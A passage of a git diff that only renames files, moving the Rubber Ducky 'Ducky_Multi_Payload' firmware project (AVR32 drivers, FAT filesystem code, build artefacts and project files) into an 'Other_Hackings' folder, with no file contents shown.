Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/udc/udc.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/udc/udc.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/udc/udc.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/udc/udc.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/udc/udc.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/asf/common/services/usb/udc/udc.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/main.d b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/main.d similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/main.d rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/main.d diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/main.o b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/main.o similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/main.o rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/src/main.o diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Framework.config b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Framework.config similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Framework.config rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Framework.config diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.atsln b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.atsln similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.atsln rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.atsln diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.atsuo b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.atsuo similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.atsuo rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.atsuo diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.avrgccproj b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.avrgccproj similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.avrgccproj rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.avrgccproj diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.avrsln b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.avrsln similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.avrsln rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.avrsln diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.avrsuo b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.avrsuo similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.avrsuo rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.avrsuo diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.cproj b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.cproj similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.cproj rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/duck.cproj diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/license.txt b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/license.txt similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/license.txt rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/license.txt diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/boards/evk1101/evk1101.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/boards/evk1101/evk1101.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/boards/evk1101/evk1101.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/boards/evk1101/evk1101.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/boards/evk1101/init.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/boards/evk1101/init.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/boards/evk1101/init.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/boards/evk1101/init.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/boards/evk1101/led.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/boards/evk1101/led.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/boards/evk1101/led.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/boards/evk1101/led.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/boards/evk1101/led.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/boards/evk1101/led.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/boards/evk1101/led.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/boards/evk1101/led.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/flashc/flashc.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/flashc/flashc.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/flashc/flashc.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/flashc/flashc.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/flashc/flashc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/flashc/flashc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/flashc/flashc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/flashc/flashc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/gpio/gpio.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/gpio/gpio.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/gpio/gpio.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/gpio/gpio.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/gpio/gpio.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/gpio/gpio.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/gpio/gpio.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/gpio/gpio.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/intc/exception.S b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/intc/exception.S similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/intc/exception.S rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/intc/exception.S diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/intc/intc.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/intc/intc.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/intc/intc.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/intc/intc.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/intc/intc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/intc/intc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/intc/intc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/intc/intc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/pm.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/pm.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/pm.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/pm.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/pm.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/pm.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/pm.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/pm.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/pm_conf_clocks.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/pm_conf_clocks.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/pm_conf_clocks.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/pm_conf_clocks.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/power_clocks_lib.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/power_clocks_lib.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/power_clocks_lib.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/power_clocks_lib.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/power_clocks_lib.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/power_clocks_lib.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/power_clocks_lib.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/power_clocks_lib.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/sleep.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/sleep.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/sleep.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/pm/sleep.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/spi/spi.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/spi/spi.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/spi/spi.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/spi/spi.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/spi/spi.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/spi/spi.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/spi/spi.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/spi/spi.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/usbb/usbb_device.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/usbb/usbb_device.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/usbb/usbb_device.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/usbb/usbb_device.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/usbb/usbb_device.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/usbb/usbb_device.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/usbb/usbb_device.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/usbb/usbb_device.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/usbb/usbb_otg.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/usbb/usbb_otg.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/usbb/usbb_otg.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/drivers/usbb/usbb_otg.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/fat.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/fat.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/fat.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/fat.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/fat.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/fat.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/fat.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/fat.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/fat_unusual.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/fat_unusual.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/fat_unusual.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/fat_unusual.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/file.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/file.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/file.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/file.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/file.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/file.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/file.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/file.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/fs_com.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/fs_com.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/fs_com.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/fs_com.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/navigation.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/navigation.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/navigation.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/navigation.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/navigation.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/navigation.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/navigation.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/services/fs/fat/navigation.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/compiler.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/compiler.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/compiler.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/compiler.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/linker_scripts/at32uc3b/0256/gcc/link_uc3b0256.lds b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/linker_scripts/at32uc3b/0256/gcc/link_uc3b0256.lds similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/linker_scripts/at32uc3b/0256/gcc/link_uc3b0256.lds rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/linker_scripts/at32uc3b/0256/gcc/link_uc3b0256.lds diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/parts.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/parts.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/parts.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/parts.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/preprocessor/mrepeat.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/preprocessor/mrepeat.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/preprocessor/mrepeat.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/preprocessor/mrepeat.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/preprocessor/preprocessor.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/preprocessor/preprocessor.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/preprocessor/preprocessor.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/preprocessor/preprocessor.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/preprocessor/stringz.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/preprocessor/stringz.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/preprocessor/stringz.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/preprocessor/stringz.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/preprocessor/tpaste.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/preprocessor/tpaste.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/preprocessor/tpaste.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/preprocessor/tpaste.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/startup/startup_uc3.S b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/startup/startup_uc3.S similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/startup/startup_uc3.S rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/startup/startup_uc3.S diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/startup/trampoline_uc3.S b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/startup/trampoline_uc3.S similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/startup/trampoline_uc3.S rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/startup/trampoline_uc3.S diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/startup/trampoline_uc3.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/startup/trampoline_uc3.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/startup/trampoline_uc3.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/startup/trampoline_uc3.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/status_codes.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/status_codes.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/status_codes.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/avr32/utils/status_codes.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/boards/board.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/boards/board.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/boards/board.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/boards/board.h diff --git 